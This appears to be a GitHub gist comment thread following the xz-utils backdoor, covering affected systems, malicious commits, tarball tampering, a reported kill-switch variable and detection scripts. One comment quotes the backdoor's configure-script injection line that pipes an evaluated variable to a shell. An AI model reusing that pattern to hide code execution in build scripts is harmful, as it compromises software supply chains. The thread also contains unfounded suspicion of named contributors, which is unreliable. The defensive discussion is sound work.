https://gynvael.coldwind.pl/?id=782

Someone put a lot of effort for this to be pretty innocent looking and decently hidden. From binary test files used to store payload, to file carving, substitution ciphers, and an RC4 variant implemented in AWK all done with just standard command line tools. And all this in 3 stages of execution, and with an "extension" system to future-proof things and not have to change the binary test files again. I can't help but wonder (as I'm sure is the rest of our security community) – if this was found by accident, how many things still remain undiscovered

Once again, this rules out the possibility of a developer going nuts over the hard work. It has to be an attack sponsored by a third-party organisation.

@LaRevoltage

@LaRevoltage Already linked in the FAQ itself now.

Oh, sorry, it wasn't updated for quite some time

@thesamesam
Author

A man has to rest! No problem. I would rather people show stuff as they find it.

@panchoh

panchoh commented Mar 30, 2024

That's wrong. It is very very likely that Jia Tan is just a fake identity. We cannot decide the one/ones behind Jia Tan.

Probably the San-Ti.

Sorry, but after two days of this I had to do it.

@brlin-tw

@cculianu

Agreed. In fact it's likely the guy isn't Chinese at all and that is 100% misdirection.

Disagreed. We shouldn't jump to any conclusions regardless of whether it is pro-Chinese/anti-Chinese.

@Z-nonymous

btw, I see mention of W11; isn't there also WSL running Debian and Ubuntu? Any potential impact?

@cw-alexcroteau

cw-alexcroteau commented Mar 30, 2024

btw, I see mention of W11, isn't there also WSL running debian and Ubuntus ? Any potential impact ?

@Z-nonymous WSL runs regular Linux distributions, with some level of patches. Afaik Ubuntu in WSL includes the regular set of packages, so there's a potential that the affected sshd version is installed just like on a "regular" Linux installation. I've personally used sshd and had to work with systemd in wsl2, so I think it would be safer for people to verify their installation to ensure the backdoored version isn't installed. Of course, it is just present in testing versions for now, and that would apply the same way on WSL.

@GoodMirek

GoodMirek commented Mar 30, 2024

Lasse Collin has started making commits to xz, removing another malicious commit blocking a Landlock sandbox:

https://git.tukaani.org/?p=xz.git;a=commitdiff;h=f9cf4c05edd14dedfe63833f8ccbe41b55823b00

Here's the malicious commit that disabled the Landlock sandbox.
https://git.tukaani.org/?p=xz.git;a=commitdiff;h=328c52da8a2bbb81307644efdb58db2c422d9ba7

Credit for noticing it: @joeyh@hachyderm.io, @cschabetsberger@mstdn.social

@KFERMercer

@cculianu

Agreed. In fact it's likely the guy isn't Chinese at all and that is 100% misdirection.

Disagreed. We shouldn't jump to any conclusions regardless of whether it is pro-Chinese/anti-Chinese.

@brlin-tw

He just used the word "likely"; why are you objecting in such a hurry?

What kind of "conclusions" did you actually disagree with?

@Z-nonymous

In the light of: https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b

The payload is extracted from the N value (the public key) passed to RSA_public_decrypt, checked against a simple fingerprint, and decrypted with a fixed ChaCha20 key before the Ed448 signature verification.

Can someone explain to me this PR openssl/openssl#23301
"LoongArch64: Fix PR #22817 introduced performance regression of ChaCha20"
submitted by someone with little activity, reviewed by xry111 and then:

xry111

My approve is useless anyway :(. We need to collect 3 approves from the OpenSSL maintainers AFAIU.

@t8m :

2 approves are sufficient.

Then @slontis approves.

It's an assembly change

@thesamesam
Author

thesamesam commented Mar 30, 2024

@Z-nonymous I'm not sure what your point is there... xry111 just misunderstood whatever the OpenSSL procedure is. t8m and slontis are both well-known, longstanding members of the OpenSSL team. xry111 and xen0n are both maintainers of some of the loong ports in the kernel/toolchain and I'm not surprised they show up to review other changes to core packages where the changes are specific to loong...

Also, while it would obviously not make any possible malicious activity okay, loong isn't exactly a big target. Not sure it would really be worth the effort, although I guess maybe during the porting period would be the best time to sneak stuff in.

In any case, to me, this looks a bit like a witch-hunt against two people who are Chinese.

I have no knowledge of the loong ISA to re-review it, but I don't really see any evidence it's merited either.

@duracell

@cculianu

Agreed. In fact it's likely the guy isn't Chinese at all and that is 100% misdirection.

Disagreed. We shouldn't jump to any conclusions regardless of whether it is pro-Chinese/anti-Chinese.

@brlin-tw

he just use the word "likely", why you makes opposition in this hurry?

what kind of "conclusions" you just disagreed actually?

I'm not a native speaker, but I also understand "likely" to mean that the chances are higher that "the guy isn't Chinese", which is just not possible to say.
So maybe the wording is just confusing for (at least) some people, or it's wrong.

@TyrHeimdalEVE

btw, I see mention of W11, isn't there also WSL running debian and Ubuntus ? Any potential impact ?

If you've updated either recently, the update included the affected packages, you enabled systemd, and you ran an sshd that was openly reachable, then yes. But that's a very long stretch, as systemd isn't even on by default in WSL.

At this point, this primarily seems to hijack a function used for decrypting certificates in order to smuggle in a payload and gain RCE, targeting OpenSSH with a systemd dependency (liblzma) as the vector.

@schkwve

schkwve commented Mar 30, 2024

Lasse Collin has started making commits to xz, removing another malicious commit blocking a Landlock sandbox:

https://git.tukaani.org/?p=xz.git;a=commitdiff;h=f9cf4c05edd14dedfe63833f8ccbe41b55823b00

Here's the malicious commit that disabled the Landlock sandbox. https://git.tukaani.org/?p=xz.git;a=commitdiff;h=328c52da8a2bbb81307644efdb58db2c422d9ba7

Do I understand correctly that a single dot prevented the code snippet from compiling and therefore disabled the Landlock sandbox?
Do snippets that fail to build trigger a warning or something? If so, how come nobody has noticed this before?

@thesamesam
Author

@schkwve It only affected the CMake build which very few people use for xz at this point. It's still WIP and not encouraged for it I think. Also, landlock support is still pretty new in the kernel, but even newer in xz, so I wouldn't expect many to notice anyway.
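On the "does a failing snippet trigger a warning" question: compile-based feature checks (such as CMake's `check_c_source_compiles`) generally treat a snippet that fails to build as "feature not available" and carry on quietly. The sketch below imitates that with Python's built-in `compile()` standing in for the C compiler; the probe contents and the `sandbox_enabled` flag are made up for illustration and are not the xz build code.

```python
def probe_compiles(snippet):
    """Return True if the snippet compiles, mimicking a configure-style feature check."""
    try:
        compile(snippet, "<probe>", "exec")
    except SyntaxError:
        # A real build system records "feature unavailable" here and moves on.
        return False
    return True


GOOD_PROBE = "import os\nvalue = os.getpid()\n"
BAD_PROBE = ".\n" + GOOD_PROBE  # one stray character before otherwise valid code


def configure(snippet):
    """Decide whether to enable the hypothetical sandbox based on the probe result."""
    return {"sandbox_enabled": probe_compiles(snippet)}


if __name__ == "__main__":
    print(configure(GOOD_PROBE))
    print(configure(BAD_PROBE))
```

Both runs finish without an error; the only difference is the value of the flag, which is why a broken probe is easy to miss unless someone checks which features actually got enabled.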

@xry111

xry111 commented Mar 30, 2024

In the light of: https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b

The payload is extracted from the N value (the public key) passed to RSA_public_decrypt, checked against a simple fingerprint, and decrypted with a fixed ChaCha20 key before the Ed448 signature verification.

Can someone explain to me this PR openssl/openssl#23301 "LoongArch64: Fix PR #22817 introduced performance regression of ChaCha20" submitted by someone with little activity, reviewed xry111 and then:

I made a stupid mistake in openssl/openssl#22817 and openssl/openssl#23301 fixes it. So I approved it quickly feeling guilty. But as I've explained my approve is useless, only the approves from OpenSSL maintainers count. I remembered 2 as 3 mistakenly though.

And my stupid mistake was "just" making it slower (the condition to use vector routine instead of scalar routine was wrong, thus scalar routine was always used regardless of input size). It's not a security issue. (Note that a Big-O regression may be considered a DoS, but in this case there's no Big-O regression.)

And, ChaCha20 is just an algorithm, both valid users and malicious users can use it. There is nothing in the change specifically favoring malicious uses. Making code faster benefits both valid users and malicious users, but nobody will reason like "to slow down malicious users let's make everything slow" for any algorithm except one-way hashes.

It's just like how we know malicious attackers use the BSGS algorithm to attack RSA with too-small keys, yet every ICPC team has the BSGS algorithm in its code base. That does not make ICPC the same as CTF.

@thesamesam
Author

Ah, I didn't realise it was fixing a previous commit of yours. In any case, my comments stand about it not being suspicious at all.

@erinacio

Let alone that it's loongarch64 assembly code. The machine code it produces won't run, and actually can't run, on any x64 machine the xz backdoor targets.

@Z-nonymous

Z-nonymous commented Mar 30, 2024

If you've updated either recently, that included the affected packages, enabled systemd and ran sshd that was available openly then yes. But that's a very long stretch as systemd isn't even on by default in WSL.

Thank you.

@Z-nonymous I'm not sure what your point is there... xry111 just misunderstood whatever the OpenSSL procedure is. t8m and slontis are both well-known, longstanding members of the OpenSSL team.

Just asking if they really reviewed it for side effects.

I'm not saying they submit faulty code; they might sometimes, in good faith, wrongly approve stuff from a bad actor that ends up having side effects. That's why I noted the pure issue.
They may really want to push Loongson arch support and are being played.

xry111 and xen0n are both maintainers of some of the loong ports in the kernel/toolchain and I'm not surprised they show up to review other changes to core packages where the changes are specific to loong...

I'm making correlations and asking for advice, i.e. liblzma_la-crc64-fast.o is the backdoor as per https://gynvael.coldwind.pl/?id=782
xry111 also committed LoongArch CRC code to xz, approved by JiaT75 in tukaani-project/xz#86

, loong isn't exactly a big target.

Well, I need to further investigate; they have reviewed many code/function modules that appear in the analysis from the thread at https://www.openwall.com/lists/oss-security/2024/03/29/4 and that have been modified for LoongArch in some form.
The breadth of areas they contribute to (comments, reviews, approvals, PRs) in that team is everywhere: compilation, system services, ssl, crypto, kernel, localization, html, assembly, c, rust, node, nvm, dosbox.

They can't possibly know every implication of updates in such a large code base.

Again:
I'm not saying they submit faulty code; they might sometimes, in good faith, wrongly approve stuff from a bad actor that ends up having side effects they don't grasp.
I will review make-ca but maybe there are places

In any case, to me, this looks a bit like a witch-hunt against two people who are Chinese.

Do you know these people IRL? Do you know the people whose PRs they approve? How do you know any GH user is Chinese? Only a real police/federal/Interpol investigation can determine that. Even then, sometimes they could arrest someone who happened to have found a USB key in Latvia instead of a Russian agent.

I've worked with many Chinese colleagues in research & engineering; they are as brilliant minds as anyone. I never implied anything Chinese-related; maybe my fault was trying to explain that Loongson is a Chinese CPU manufacturer for context. I never even said they were actually from that company. I just assumed they implement support for it.

They might be played by people complaining about bad Loongson support and providing engineered reports, forcing them to make changes whose side effects they don't always understand.

If you've updated either recently, that included the affected packages, enabled systemd and ran sshd that was available openly then yes. But that's a very long stretch as systemd isn't even on by default in WSL.

Thank you.

@Z-nonymous

Z-nonymous commented Mar 30, 2024

Again thank you xry111 for the replies even though I would also like other maintainers input about their review.

@Z-nonymous

Let alone it's loongarch64 assembly code. The machine code it produces just won't run and actually can't run on any x64 machine the xz backdoor targets to.

Right, in some other places it's just C defines that can somehow be modified at the pre-processing stage to be enabled.

@erinacio

erinacio commented Mar 30, 2024

I need to further investigate ...

Please stop the pointless investigation unless you meet any of these:

  • you're a security expert and can audit the code on your own;
  • you know any potentially affected repos in depth so you can find any suspicious modification;
  • you can stop posting unsound suspicions here;

Please, as I indicated before, submit issues and discuss them in each potentially affected repo. This is more or less a news follow-up gist. I only want to hear about the latest updates on the security incident.


Maybe you need an internet break more than larhzu does? The world is already aware of this issue and everyone related is working hard on it. The next time you check the security issue, it may already be sorted out.

@kam821

kam821 commented Mar 31, 2024

Maybe you need an internet break more than larhzu does? The world is already aware of this issue and everyone related is working hard on it. The next time you check the security issue, it may already be sorted out.

+1

@marco-silva0000

I'd pay good money if you'd shut up

We might need you @Ninpo

@Ninpo

Ninpo commented Mar 31, 2024

@Z-nonymous you really need to leave this thread. You're contributing nothing but white noise and misdirection. xry111 have nothing, nothing to do with this xz vulnerability.

@timtas

timtas commented Mar 31, 2024

@Z-nonymous you really need to leave this thread. You're contributing nothing but white noise and misdirection. xry111 have nothing, nothing to do with this xz vulnerability.

Just out of curiosity: is "xry111 have" bad english or woke-speak?

@thesamesam
Author

Let's please focus on the issue at hand. Thanks.

@shanghaox

If someone wants to do bad things, he will avoid using his real name.

@FrankHB

FrankHB commented Mar 31, 2024

kill the autotools, use meson (the philosophy of meson is: only what is in git should go to the dist, there is even no need for a release, just a tag)

Or take a step further: kill binary distros and use source for confidence in all serious cases. Binaries are only a cache, with no more attack surface.

This also prevents vendor lock-in. Consider when you have a compromised meson...

@ItzSwirlz

I want to note - I'm not an expert or anything, but it seems that malware infections are now spread not through cringy downloads from sketchy sites. It seems that attackers are now working towards infecting safe, regular files.

Example: Fractureiser was the result of a guy who compromised CurseForge accounts and injected code into Minecraft Mod JAR files that would then download a payload, and basically install hidden malware onto the system and sneakily hide itself in with similar names to other legit programs.

Here, although this was not an account compromise, the idea is the same: sneakily inject and obfuscate malicious code to secretly deliver a payload, and then hide it for a scary amount of time before tech-savvy people figure out that something suspicious is going on.

This makes it easier for bad actors in many different ways - it solves the issue of users thinking "I couldn't have gotten a virus, I got it from a legitimate source!" and also solves the issue of obvious malware tipping the user off that something is wrong. Instead it will just sit dormant and do its work, without ever having to reveal itself.

@sgammon

sgammon commented Mar 31, 2024

There is a string embedded in the binary, as shown here:

https://gist.github.com/q3k/af3d93b6a1f399de28fe194add452d01#file-hashes-txt-L115

Which appears to function as a killswitch:

https://piaille.fr/@zeno/112185928685603910

In which case this backdoor may be rendered inert by adding the following to /etc/environment:

yolAbejyiejuvnup=Evjtgvsh5okmkAvj
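A small sketch for checking whether that line is already present, assuming the plain `KEY=VALUE` format of /etc/environment. The parser and function names are made up for illustration, and the key/value pair is just the one reported above.

```python
# Key/value pair as reported in the linked analysis; not independently verified here.
KILL_SWITCH = ("yolAbejyiejuvnup", "Evjtgvsh5okmkAvj")


def parse_environment(text):
    """Parse simple KEY=VALUE lines as found in /etc/environment."""
    variables = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        variables[key.strip()] = value.strip().strip('"')
    return variables


def kill_switch_present(text):
    """True if the reported kill-switch variable is set to the reported value."""
    key, value = KILL_SWITCH
    return parse_environment(text).get(key) == value


if __name__ == "__main__":
    sample = 'PATH="/usr/bin:/bin"\nyolAbejyiejuvnup=Evjtgvsh5okmkAvj\n'
    print(kill_switch_present(sample))
```

This only checks that the line is present in the text it is given; it says nothing about whether the variable actually reaches the sshd process or whether the reported kill switch behaves as described.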

@FrankHB

FrankHB commented Mar 31, 2024

I want to note - I'm not an expert or anything, but it seems the way of malware infections are now spread is not through cringy downloads from sketchy sites. It seems that attackers are now working towards infecting safe, regular files.

Example: Fractureiser was the result of a guy who compromised CurseForge accounts and injected code into Minecraft Mod JAR files that would then download a payload, and basically install hidden malware onto the system and sneakily hide itself in with similar names to other legit programs.

Here, although this was not account compromise, the idea of sneakily injecting and obfuscating malicious code to secretly do a payload, and then hide itself for a scary amount of time before tech-savvy people figure out something suspicious is going on.

This makes it easier for bad actors in many different ways - this solves the issue of users thinking "I couldn't have gotten a virus, I got it from a legitimate source!" and also solves the issue of being apparent malware that the user knows something is wrong. Instead it will just sit dormant and do its work, without ever having to reveal itself.

Nothing new. For the sake of security, FOSS always works as a PoW (proof of work) system: if you don't work hard enough to review all the code you use yourself (to prove it is "secure" enough), it can be compromised for a long time. Sometimes there are even no bad actors at all, just plain old bugs, before you get some damage.

Anyone lacking the capability to audit the code has to get someone else to do the work. Blindly relying on the reputation of normal developers is the trivial implementation of this strategy, and (ironically) it really works, just not well in cases like this one.

That's still better than a world of blobs everywhere, at least in the cost of identifying the risks (even if not fixable).

@smokhov

smokhov commented Mar 31, 2024

@ItzSwirlz -- this is why supply chain attacks targeting something very widely used are gaining steam now. Audits should be based on more than just trust for all source code components, popular or not, especially libraries. CI/CD pipelines on places like GitHub, GitLab, etc. should offer such services to developers by default and free of charge. Like dependabot does here, or other static scanners, they should also vet release tarballs. But it is hard to prevent an insider going rogue, like that guy (I forget who) did with a popular node package a couple of years ago... This is a real problem. Still, I'm glad this happened in the open, in open source, so it could be caught sooner than if the same thing happened in a popular proprietary application from a private company whose code is not open for audit.

@CodingWithAnxiety

kill the autools, use meson (the philosophy of meson is : only what is in git should go to the dist, there is even no need for a release, just a tag)

Or take a step further: kill binary distro, use source for confidence, in all serious cases. Binaries are only cache. with no more attack surface.

This also prevents vendor lock-in. Consider when you have a compromised meson...

Dear god, what're you trying to do? Make linux unusable? We have gentoo for this which, by the way, was also affected by this XZ backdoor. "Make every distro compiled..."

You seem to forget not everyone has a top of the line CPU. God forbid you like google chrome or any proprietary software...

@lazyruss

I have not checked v5.6.0, but in 5.6.1 build-to-host.m4 is not important. The script injection code is right in configure (at least in the Debian tarball).
"build-to-host":C) eval $gl_config_gt | $SHELL 2>/dev/null ;;

@thesamesam
Author

thesamesam commented Mar 31, 2024

@lazyruss The variables which populate $gl_config_gt come from m4/build-to-host.m4. In general, M4 macros are used to populate configure. configure is a generated file and is the product of various other bits, including M4 macros.

@jsuelwald

Or take a step further: kill binary distro, use source for confidence, in all serious cases. Binaries are only cache. with no more attack surface.

And this won't change anything as the source code was compromised itself.

@zacanger

zacanger commented Mar 31, 2024

Or take a step further: kill binary distro, use source for confidence, in all serious cases. Binaries are only cache. with no more attack surface.

And this won't change anything as the source code was compromised itself.

It's also not a great idea. Source distribution sounds great, but I don't really want to waste 30 minutes building Firefox every time I update, and many package managers and Linux distributions can't afford build servers to manually reset, test checksums against the upstream repo, re-apply distro/package-manager-specific patches, and build.

From what I understand, this Gist and its comments are meant to be discussion of this specific issue, though (scroll to the top and read the TODOs). It might be useful to move all this other discussion, which has a lot of good ideas, somewhere else. There are good ideas in here that someone might want to work with, but a lot of them aren't relevant to figuring out the impact of this attack and mitigating it in the short term.

@AlexBaranowski

AlexBaranowski commented Mar 31, 2024

btw, I see mention of W11, isn't there also WSL running debian and Ubuntus ? Any potential impact ?

If you've updated either recently, that included the affected packages, enabled systemd and ran sshd that was available openly then yes. But that's a very long stretch as systemd isn't even on by default in WSL.

THIS IS NOT TRUE! A LOT OF DISTROS INCLUDING UBUNTU RUN SYSTEMD BY DEFAULT IN WSL

How do I know that? I made a few distro packages for WSL, some of them even public :). Let's check the default Ubuntu on WSL2:

PS C:\Users\Alex> wsl -d Ubuntu
alex@citadel:/mnt/c/Users/Alex$ ps aux | head -2
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.2  0.0 165764 11260 ?        Ss   15:02   0:00 /sbin/init
alex@citadel:/mnt/c/Users/Alex$ ll /sbin/init
lrwxrwxrwx 1 root root 20 Sep 20  2023 /sbin/init -> /lib/systemd/systemd*
alex@citadel:/mnt/c/Users/Alex$ cat /etc/wsl.conf

[boot]
systemd=true

https://learn.microsoft.com/en-us/windows/wsl/systemd

@TyrHeimdalEVE @thesamesam @Z-nonymous The WSL systems might be vulnerable.

@timtas

timtas commented Mar 31, 2024

So what? Are we now starting to fix Microsoft's problems? Funny, where Linux stands now at the moment, as some kind of Microsoft Windows subsystem?

@TommyTran732

What version of xz-utils is in WSL though? On my normal Ubuntu Mantic VM it's still 5.4.x

@TommyTran732

So what? Are we now starting to fix Microsoft's problems? Funny, where Linux stands now at the moment, as some kind of Microsoft Windows subsystem?

Not helpful man. What is wrong with you?

@zacanger

zacanger commented Mar 31, 2024

What version of xz-utils is in WSL though? On my normal Ubuntu Mantic VM it's still 5.4.x

@TommyTran732 Last I checked (a few years ago) WSL just uses the chosen distro's package repositories. So for Ubuntu, on everything except noble (24.04), it's 5.4 or 5.2. On noble it was at 5.6.1, but then re-released as 5.6.1+really5.4.5-1. Should be fine unless anyone was testing the upcoming release, or backporting packages.
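The version strings above can be turned into a quick check. This is only a rough sketch: it assumes Debian-style version strings, the "+really" convention (where `5.6.1+really5.4.5-1` actually contains 5.4.5), and that 5.6.0 and 5.6.1 are the only affected upstream releases, as the FAQ states. The function names are made up for illustration.

```python
import re

# Upstream releases reported as backdoored in the FAQ above.
AFFECTED_UPSTREAM = {"5.6.0", "5.6.1"}


def upstream_version(pkg_version: str) -> str:
    """Return the effective upstream version of a Debian-style package version.

    Assumes the "+really" convention: "5.6.1+really5.4.5-1" contains 5.4.5.
    """
    # Drop an optional epoch prefix such as "1:".
    version = pkg_version.split(":", 1)[-1]
    if "+really" in version:
        version = version.split("+really", 1)[1]
    # Keep only the leading dotted number, dropping the revision and suffixes.
    match = re.match(r"\d+(?:\.\d+)*", version)
    return match.group(0) if match else ""


def is_affected(pkg_version: str) -> bool:
    """True if the package version maps to a known-bad upstream release."""
    return upstream_version(pkg_version) in AFFECTED_UPSTREAM


print(is_affected("5.6.1-1"))              # True
print(is_affected("5.6.1+really5.4.5-1"))  # False
```

A version match only says the package ships an affected release; whether the backdoor is actually reachable depends on the other conditions listed in the FAQ.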

@threefcata

@Z-nonymous I find you very pretentious. On one hand you keep claiming 'this is not against China or Chinese', MEANWHILE, all your apparent genuine questions and reasonable doubts imply something so obvious that you keep denying. Stop even trying to fool everyone, do you think nobody sees what you are trying to get at?

@daniel-dona

So what? Are we now starting to fix Microsoft's problems? Funny, where Linux stands now at the moment, as some kind of Microsoft Windows subsystem?

Wasn't the initial reporter of the xz-utils backdoor a Microsoft developer? 🤨

@bwDraco

bwDraco commented Mar 31, 2024

My Gentoo systems build xz-utils with Clang LTO. Does this circumvent the backdoor?

@githubuser6000

@thesamesam Is there a way I can donate to the original maintainer?

@f00b4r0

f00b4r0 commented Mar 31, 2024

@thesamesam dunno if this was mentioned before, but it's not clear from the current FAQ: systems NOT using systemd may still be affected, simply because libsystemd is installed. Case in point: Devuan, which does not use systemd init but still ships a Debian-patched sshd that links in libsystemd and loads liblzma.

https://pkginfo.devuan.org/cgi-bin/package-query.html?c=package&q=openssh-server=1:9.7p1-2+b1
https://pkginfo.devuan.org/cgi-bin/package-query.html?c=package&q=libsystemd0=255.4-1+b1
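To check the linkage on a given machine rather than from package metadata, one option is to look at what `ldd` reports for the sshd binary, since it lists transitive dependencies too. A minimal sketch that only parses `ldd`-style text; the sample output below is hypothetical and abbreviated, and the helper names are made up for illustration:

```python
def linked_libraries(ldd_output: str) -> set[str]:
    """Extract library file names from ldd-style output."""
    libs = set()
    for line in ldd_output.splitlines():
        fields = line.split()
        if fields:
            # The first field is the soname, or a full path for the loader.
            libs.add(fields[0].rsplit("/", 1)[-1])
    return libs


def pulls_in_liblzma(ldd_output: str) -> bool:
    """True if liblzma appears anywhere in the resolved dependency list."""
    return any(name.startswith("liblzma.so") for name in linked_libraries(ldd_output))


# Hypothetical, abbreviated ldd output for a distro-patched sshd.
SAMPLE = """\
\tlibsystemd.so.0 => /lib/x86_64-linux-gnu/libsystemd.so.0 (0x00007f0000000000)
\tliblzma.so.5 => /lib/x86_64-linux-gnu/liblzma.so.5 (0x00007f0000100000)
\tlibc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f0000200000)
"""

print(pulls_in_liblzma(SAMPLE))  # True
```

On a real system the input would be the text printed by running `ldd` on the sshd binary. A hit means liblzma gets loaded into sshd, regardless of which init system is running.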

HTH

@leagris

leagris commented Mar 31, 2024

What version of xz-utils is in WSL though? On my normal Ubuntu Mantic VM it's still 5.4.x

dpkg-query -Wf '${package}\t${Version}\n' '*xz*'

@pillowtrucker

looool they bragged the whole day on twitter that they're immune to it because they don't have evil systemd but they're too stupid to know what the package they leeched off debian actually links against

@FlyingFathead

FlyingFathead commented Mar 31, 2024

The release tarballs upstream publishes don't have the same code that GitHub has. This is common in C projects so that downstream consumers don't need to remember how to run autotools and autoconf. The version of build-to-host.m4 in the release tarballs differs wildly from the upstream on GitHub.

After my earlier comment on this yesterday and having slept on it, I can't get past the thought that this is a prime example of prioritizing convenience over secure practices. The fact that an attack like this can be "slipped in" just like that means that tarball tampering is going to be a target vector for supply chain attacks and other types of code tampering. Especially after this case, now that the cat's out of the bag, so to speak.

Repo tarballs should compare against the repo contents. Having a "single source of truth" for all components of the project is the idea. There is a dire need to ensure consistency between what developers see and work with in the repository and what end users receive in the tarball.
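As a rough illustration of what such a consistency check could look like, here is a minimal sketch that hashes every file in a release tarball and compares it against a checkout of the tagged source. It assumes the tarball has a single top-level directory (e.g. `project-x.y.z/`) and that the checkout is already at the matching tag; the function names are made up for illustration.

```python
import hashlib
import tarfile
from pathlib import Path


def tarball_digests(tar_path: str, strip_components: int = 1) -> dict[str, str]:
    """Map each regular file in the tarball to its SHA-256 digest."""
    digests = {}
    with tarfile.open(tar_path) as tar:
        for member in tar:
            if not member.isfile():
                continue
            # Drop the leading "project-x.y.z/" directory (assumed layout).
            parts = Path(member.name).parts[strip_components:]
            if not parts:
                continue
            data = tar.extractfile(member).read()
            digests["/".join(parts)] = hashlib.sha256(data).hexdigest()
    return digests


def tree_digests(root: str) -> dict[str, str]:
    """Map each regular file under root (ignoring .git) to its SHA-256 digest."""
    base = Path(root)
    return {
        path.relative_to(base).as_posix(): hashlib.sha256(path.read_bytes()).hexdigest()
        for path in base.rglob("*")
        if path.is_file() and ".git" not in path.relative_to(base).parts
    }


def compare(tar_path: str, checkout: str) -> tuple[list[str], list[str]]:
    """Return (files only in the tarball, files whose contents differ)."""
    tar_files = tarball_digests(tar_path)
    tree_files = tree_digests(checkout)
    only_in_tar = sorted(set(tar_files) - set(tree_files))
    differing = sorted(
        name
        for name in set(tar_files) & set(tree_files)
        if tar_files[name] != tree_files[name]
    )
    return only_in_tar, differing
```

For autotools projects the tarball-only list will be long, since generated files such as configure are shipped on purpose. That list is exactly the part nobody reviews in the repository, so it is the part such a check would need to surface.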

Whatever it introduces in terms of increased complexity, required automation and such, needs to be worked out. Include build tools in the tarball if need be, more robust integrity checks, automated consistency checks, transparent build processes, version-controlled release artifacts, reproducible builds, automated auditing, there's already multiple suggestions on this... perhaps that's a tall order, but right now, this attack implies that any project with a tarball out there might have literally anything in it. There's no other way to put it than the current practice showing a gaping security hole that overall enabled this exploit.

How can we be sure that this method of attack isn't already being utilized in other projects right now?

@gh-nate

gh-nate commented Mar 31, 2024

@thesamesam: Hi, there are coordinated reverse engineering efforts ongoing on chat room(s) as discussed/posted under the linked Openwall oss-security mailing list thread. Is this worth a mention on your gist?

I refrained from posting the exact details here due to the risk of the low quality of the discussion spreading over.

@trip54654

trip54654 commented Mar 31, 2024

IFUNC was added to enable this attack. Is IFUNC actually useful for anything legitimate? I know the attacker convinced glibc that it was, but... it's glibc, they love useless features that complicate everything.

Edit: and in particular, does IFUNC have the potential to reduce security by design?

@jgilbert2017

jgilbert2017 commented Mar 31, 2024

(slightly off topic)
I have submitted a feature request to the C# package management system NuGet to request support for publishing packages via source (git commit hash). Publishing is currently achieved via author-signed binaries (oof).

Please see the issue below and voice your opinion on this if you have one.
NuGet/NuGetGallery#9889

We should take the lessons learned from this incident and apply them across the entire OSS ecosystem.

@jmakovicka

jmakovicka commented Mar 31, 2024

IFUNC was added to enable this attack. Is IFUNC actually useful for anything legitimate? I know the attacker convinced glibc that it was, but... it's glibc, they love useless features that complicate everything.

They added CPU optimized CRC computation code, which served as a pretext for ifunc usage.

Similarly, the test infrastructure was created as a hideout for the malicious payload.

@AdrianBunk

@smintrh78 I've responded there why your suggestion implies that you don't understand the problem.

@teyhouse

I did some testing on detecting the CVE inside container images. As of right now, it seems the default container scan from Trivy does not yet detect CVE-2024-3094, but grype does. I would recommend checking on an SBOM basis, for example:
https://github.com/teyhouse/CVE-2024-3094/blob/main/check_sbom.sh
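For illustration only (this is not the linked script), an SBOM-based check could be sketched as follows. It assumes a CycloneDX-style JSON document with a top-level `components` list whose entries carry `name` and `version`; the package names in `XZ_PACKAGES` are assumptions, since distros name the xz packages differently.

```python
import json
import re

# Package names are assumptions; adjust for the distro in the image.
XZ_PACKAGES = {"xz", "xz-utils", "xz-libs", "liblzma", "liblzma5"}
# Matches 5.6.0 / 5.6.1 with an optional epoch, but not e.g. 5.6.10.
AFFECTED = re.compile(r"^(?:\d+:)?5\.6\.[01](?!\d)")


def affected_components(sbom_json: str) -> list[str]:
    """List "name version" for xz components at an affected version."""
    sbom = json.loads(sbom_json)
    hits = []
    for component in sbom.get("components", []):
        name = component.get("name", "")
        version = component.get("version", "")
        # Debian's "+really" versions carry older code under a newer number.
        if name in XZ_PACKAGES and AFFECTED.match(version) and "+really" not in version:
            hits.append(f"{name} {version}")
    return hits
```

Scanning the SBOM avoids depending on whether a given scanner's vulnerability database already knows the CVE, at the cost of maintaining the package-name list by hand.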


@Sepero

Sepero commented Mar 31, 2024

If instead of obfuscated code, imagine if the attacker did things a little smarter? Like perhaps an "accidental" buffer overflow (or other memory based exploit)...

@FrankHB

FrankHB commented Mar 31, 2024

kill the autools, use meson (the philosophy of meson is : only what is in git should go to the dist, there is even no need for a release, just a tag)

Or take a step further: kill binary distro, use source for confidence, in all serious cases. Binaries are only cache. with no more attack surface.
This also prevents vendor lock-in. Consider when you have a compromised meson...

Dear god, what're you trying to do? Make linux unusable? We have gentoo for this which, by the way, was also affected by this XZ backdoor. "Make every distro compiled..."

You seem to forget not everyone has a top of the line CPU. God forbid you like google chrome or any proprietary software...

This has nothing to do with Linux itself, as this can be a pure userland thing, and I'm not saying it should prevent you from specifying a "source" in the form of precompiled binaries (including the kernel image) once you are already confident enough.

The key point is to make sure each piece of binary code (except what users develop locally) is built entirely from some really auditable source which is actually used by the system, rather than just from some random source packages separately maintained by the upstream repo admins.

This is not far from the spirit of meson mentioned here. It is just a strategy enforced across the whole system by default.

Gentoo is not that unusable when the binary cache is effectively shared. A more significant problem is that it seems so unfriendly to the carbon footprint in any serious configuration... It is certainly a nonstarter for most users who lack knowledge of what happens under the hood (esp. to distinguish which parts of the build during installation are actually totally redundant).

To share the cache efficiently, you have to share the configurations to precisely reproduce the builds of almost every piece of software in the system. Unfortunately, most binary distros lack a mechanism to handle such things systematically. To the best of my knowledge, nix and guix are among the few that get such things virtually right at the base (purely functional configuration versioning), but they are still too far from most industrial users.

This also won't automatically solve the problem of inefficient build systems, though.

@wtznc

wtznc commented Mar 31, 2024

GitHub has just restored access to his account. There may be many more repositories where malicious code can be found - e.g. llvm compiler llvm/llvm-project#63957

@SyntaxDreamer

So what? Are we now starting to fix Microsoft's problems? Funny, where Linux stands now at the moment, as some kind of Microsoft Windows subsystem?

An infected host, regardless of where or how it is running, affects everyone equally. DoS attacks, spam, relays, etc. Does it matter if it's running under Windows WSL, a VM or Docker? No, it does not.

@Leseratte10

GitHub has just restored access to his account.

Doesn't look like it. "JiaT75" is still suspended.

@NuLL3rr0r

Somebody created this single page analysis on Twitter.

Also this gist is very interesting.

@Leseratte10

Leseratte10 commented Mar 31, 2024

You're looking in the wrong place. Just because you can see the profile doesn't mean the user isn't suspended


@thimslugga

